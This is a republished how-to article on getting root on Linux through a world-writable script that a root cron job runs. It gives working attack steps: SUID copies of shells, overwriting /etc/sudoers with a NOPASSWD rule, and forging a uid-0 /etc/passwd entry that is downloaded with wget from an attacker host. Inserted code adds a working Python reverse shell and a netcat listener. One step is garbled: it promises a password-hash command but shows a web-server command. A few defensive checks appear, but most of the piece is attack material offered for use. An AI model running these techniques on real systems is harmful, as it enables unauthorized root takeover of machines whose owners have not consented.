

How to realize the lifting of Rights under Linux through writable files

2025-01-18 Update From: SLTechnology News&Howtos shulou


Shulou(Shulou.com)06/02 Report--

In this issue we look at how privileges can be escalated on Linux through writable files. The article is analysed from a practitioner's perspective; I hope you gain something from reading it.

On Linux everything is a file, including directories and devices, and every file carries read, write and execute permissions. When an administrator sets file permissions, they should reflect what each Linux user actually needs; a script that root executes but that every user can write to is exactly the mistake this article exploits.

Here we look at how writable files and scripts can be used for privilege escalation on Linux. Let's get straight to the point.

Suppose we have already compromised the target and hold an SSH login as a non-root user. The first step is to enumerate every file the current user can write to:

find / -writable -type f 2>/dev/null | grep -v "/proc/"
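As an added example (not code from the original article), here is a Python version of the same enumeration that also cross-references each writable file against a crontab, which is the check that tells you whether a writable script is actually executed by a privileged job. The directory layout, file names and crontab line it builds under a temporary directory are constructed for the demonstration; it never touches the real /etc/crontab.

```python
"""Enumerate writable files and check which ones a crontab executes.

Added example, not part of the original article. The demo tree, file
names and crontab line below are constructed in a temporary directory.
"""
import os
import stat
import tempfile

# Pseudo-filesystems: the article's one-liner strips /proc with grep,
# these are skipped the same way when scanning from "/".
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")


def enum_writable(root="/"):
    """Return (path, world_writable, writable_by_me) for regular files under root.

    world_writable is taken from the mode bits (o+w), so the answer does not
    change depending on who runs the scan; writable_by_me is what
    `find -writable` reports, i.e. access(2) with W_OK for the current user.
    Unreadable directories are skipped, like `2>/dev/null` in the article.
    """
    results = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        if root == "/" and dirpath.startswith(PSEUDO_FS):
            dirnames[:] = []  # do not descend into pseudo-filesystems
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):  # skip symlinks, sockets, etc.
                continue
            world = bool(st.st_mode & stat.S_IWOTH)
            mine = os.access(path, os.W_OK)
            if world or mine:
                results.append((path, world, mine))
    return results


def cron_references(crontab_text, paths):
    """Map each path in `paths` to the crontab lines whose command mentions it.

    A writable script that appears in a root crontab is exactly the
    sanitizer.py situation: whatever is written into it runs as root.
    Comments and blank lines are ignored; matching is on whole tokens.
    """
    hits = {}
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        tokens = line.split()
        for path in paths:
            if path in tokens:
                hits.setdefault(path, []).append(line)
    return hits


def build_demo_tree():
    """Construct a throwaway tree resembling the article's target (constructed data)."""
    root = tempfile.mkdtemp(prefix="writable-demo-")
    script = os.path.join(root, "lib", "log", "sanitizer.py")
    os.makedirs(os.path.dirname(script))
    with open(script, "w") as fh:
        fh.write("import os\nos.system('rm -r /tmp/*')\n")
    os.chmod(script, 0o777)  # the 777 the article found
    shadow = os.path.join(root, "etc", "shadow")
    os.makedirs(os.path.dirname(shadow))
    with open(shadow, "w") as fh:
        fh.write("root:*:0:0:99999:7:::\n")
    os.chmod(shadow, 0o600)  # correctly locked down: must not be reported
    crontab = "# constructed /etc/crontab\n*/5 * * * * root python3 %s\n" % script
    return root, script, shadow, crontab


def demo():
    """Run the enumeration against the constructed tree and return the findings."""
    root, script, shadow, crontab = build_demo_tree()
    world_writable = {p for p, world, _ in enum_writable(root) if world}
    hits = cron_references(crontab, world_writable)
    return script, shadow, world_writable, hits


if __name__ == "__main__":
    script, shadow, world_writable, hits = demo()
    for path in sorted(world_writable):
        print("world-writable:", path)
    for path, lines in hits.items():
        print("run by cron   :", path, "->", lines[0])
```

The mode-bit test is deliberately separate from os.access: if you run the scan as root, `find -writable` reports every file on the box, while the o+w bit still singles out the files an unprivileged user could have tampered with. On a real host, feed cron_references the contents of /etc/crontab and the files under /etc/cron.d.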

In the output there is a Python file in the /lib/log directory. Looking at it, sanitizer.py has permissions 777, so anyone can read, write and execute it:

The file appears to be an administrator's script for cleaning rubbish out of /tmp, run automatically (by a root cron job) at a fixed interval. If an attacker discovers this too, they can escalate privileges in the following ways.

The first method

Copy /bin/sh to /tmp and set the SUID bit on /tmp/sh. This method is simple. First open the file in an editor, for example "nano sanitizer.py", and replace "rm -r /tmp/*" with the following:

os.system('cp /bin/sh /tmp/sh')
os.system('chmod u+s /tmp/sh')

The next time the job runs it creates an SUID copy of sh in /tmp; run it to get root privileges. (If /bin/sh on the target is bash rather than dash, bash drops the elevated effective uid on start-up unless it is invoked with -p, so run ./sh -p in that case.)

cd /tmp
ls
./sh
id
whoami

The second method

As before, replace "rm -r /tmp/*" with the following:

os.system('chmod u+s /bin/dash')

After a while the job sets the SUID bit on /bin/dash, and running it gives root privileges (dash, unlike bash, keeps the elevated effective uid):

/bin/dash
id
whoami

The third method

Here replace "rm -r /tmp/*" with Python reverse-shell code that connects back to your machine, then start a netcat listener in a new terminal:

After a while you receive the reverse shell on netcat, and it is running as root:

nc -lvp 1234
id
whoami
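The reverse-shell payload the third method refers to is not shown on the page. As an added example (not the article's code), here is a Python version together with a loopback harness that connects it to a listener on 127.0.0.1, so the exchange can be watched without a second machine. The host, port and the use of /bin/sh are assumptions of this example; in the article's scenario you would put your own address and the port netcat listens on (1234 above) into the reverse_shell call and paste only that into sanitizer.py.

```python
"""Python reverse shell plus a loopback harness to exercise it locally.

Added example, not the article's code. The attacker host and port are
parameters; the demo uses 127.0.0.1 and an OS-chosen port.
"""
import os
import socket


def reverse_shell(host, port):
    """Connect back to host:port and hand the socket to /bin/sh as stdin/out/err.

    This is the classic os.dup2 pattern: after the three dup2 calls the
    shell reads commands from the socket and writes results back into it.
    In the article's scenario this runs as root from the cron job, so the
    shell that appears on the listener is a root shell.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    for fd in (0, 1, 2):
        os.dup2(sock.fileno(), fd)
    os.execv("/bin/sh", ["/bin/sh"])


def loopback_demo(command="id", timeout=10.0):
    """Listen on 127.0.0.1, fork a child that calls reverse_shell(), run one command.

    Returns what the shell sent back. Timeouts keep a failed connection
    from hanging forever; the child exits with status 1 if exec fails.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # port 0: let the OS pick a free port
    listener.listen(1)
    listener.settimeout(timeout)
    port = listener.getsockname()[1]

    pid = os.fork()
    if pid == 0:  # child: plays the role of the hijacked sanitizer.py
        try:
            reverse_shell("127.0.0.1", port)
        finally:
            os._exit(1)

    conn, _ = listener.accept()
    conn.settimeout(timeout)
    conn.sendall((command + "\nexit\n").encode())  # "exit" makes sh close the socket
    output = b""
    try:
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            output += chunk
    except socket.timeout:
        pass
    conn.close()
    listener.close()
    os.waitpid(pid, 0)
    return output.decode(errors="replace")


if __name__ == "__main__":
    print(loopback_demo("id; whoami"))
```

Run stand-alone, the script prints the output of id and whoami for the current user, because nothing here is SUID or cron-driven; it is the placement inside a root-executed script, not the code itself, that makes the resulting shell root.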

The fourth method

This is one of the most interesting ones: we grant our own account sudo rights. As you can see, wernerbrandes cannot run sudo at the moment:

Replace "rm -r /tmp/*" with the following:

os.system('echo "wernerbrandes ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers')

After a while, when you run "sudo -l", you will find that the account has become a sudo user, and you can get root privileges. Note that ">" overwrites /etc/sudoers completely, which destroys the existing configuration and is easy to notice; appending with ">>" is less destructive:

sudo -l
sudo bash
id

The fifth method

On any Linux-like system the passwd file is important, and if an attacker can modify it, it becomes a way to root. /etc/passwd is world-readable, so we can view it directly with the cat command.

You can see the nemo user's record highlighted in the image below. UID 1000 and GID 1000 are the first ordinary user account on the system, not an administrator; we will change the nemo record so that it becomes uid 0, i.e. root. First copy the contents of /etc/passwd into a blank text file on the attacking machine.

Then in a new terminal, generate a salted password hash (MD5-crypt, the $1$ format):

cd Desktop
python -m SimpleHTTPServer 80

(SimpleHTTPServer is the Python 2 module; on Python 3 the equivalent module is http.server.)

Using the writable script, replace "rm -r /tmp/*" with the following:

os.system('chmod u+s /bin/cp')

After a while the job sets the SUID bit on /bin/cp, so cp now runs with root's effective uid and can write to files the user normally cannot.

Download the modified passwd file into the target's /tmp directory and copy it over the original:

cd /tmp
wget http://192.168.1.103/passwd
ls -al /bin/cp
cp passwd /etc/passwd

Check that the passwd file was replaced:

tail /etc/passwd

Get root by switching to nemo with the password 123 that was hashed above:

su nemo
whoami
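As an added example (not the article's code) covering the fifth method end to end, the Python below rewrites the chosen user's passwd record the way the text describes (hash in the second field, uid and gid 0) and, from the defender's side, lists the accounts such a change produces: any account with uid 0 other than root, and any account whose passwd entry carries a hash instead of "x". The sample passwd text and the hash string are constructed placeholders; for a real hash use the output of openssl passwd -1 -salt abc 123 as the article does.

```python
"""Forge a uid-0 passwd entry and, from the defender's side, detect it.

Added example, not the article's code. The sample passwd text and the
password hash below are constructed; generate a real hash with
`openssl passwd -1 -salt abc 123` as the article does.
"""

# Constructed sample resembling the target's /etc/passwd.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
nemo:x:1000:1000:nemo,,,:/home/nemo:/bin/bash
"""

# Constructed placeholder in the $1$<salt>$<hash> shape openssl produces.
SAMPLE_HASH = "$1$abc$ConstructedPlaceholderHash0"


def parse_passwd(text):
    """Split passwd text into lists of 7 fields; malformed lines are rejected."""
    entries = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7:
            raise ValueError("malformed passwd line: %r" % raw)
        entries.append(fields)
    return entries


def forge_root_entry(text, user, password_hash):
    """Return passwd text where `user` has the given hash and uid/gid 0:0.

    Putting a hash in the second field overrides the 'x' that points at
    /etc/shadow, so su checks the password against this hash directly.
    """
    rewritten = []
    found = False
    for fields in parse_passwd(text):
        if fields[0] == user:
            fields[1] = password_hash
            fields[2] = fields[3] = "0"
            found = True
        rewritten.append(":".join(fields))
    if not found:
        raise KeyError("no such user: %s" % user)
    return "\n".join(rewritten) + "\n"


def uid0_accounts(text):
    """Defender's check: every account whose uid is 0, not just root."""
    return [fields[0] for fields in parse_passwd(text) if fields[2] == "0"]


def inline_hash_accounts(text):
    """Defender's check: accounts carrying a hash in passwd instead of 'x'."""
    return [fields[0] for fields in parse_passwd(text)
            if fields[1] not in ("x", "*", "!", "")]


if __name__ == "__main__":
    forged = forge_root_entry(SAMPLE_PASSWD, "nemo", SAMPLE_HASH)
    print(forged)
    print("uid 0 accounts:", uid0_accounts(forged))
    print("inline hashes :", inline_hash_accounts(forged))
```

The two defender checks are cheap to run from a cron job or a file-integrity tool and catch this technique even when the attacker leaves the original root line untouched, because the forged record still has to carry uid 0 and a non-"x" password field.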

In this article we showed how attackers can use writable files to escalate privileges. I hope you found it useful.
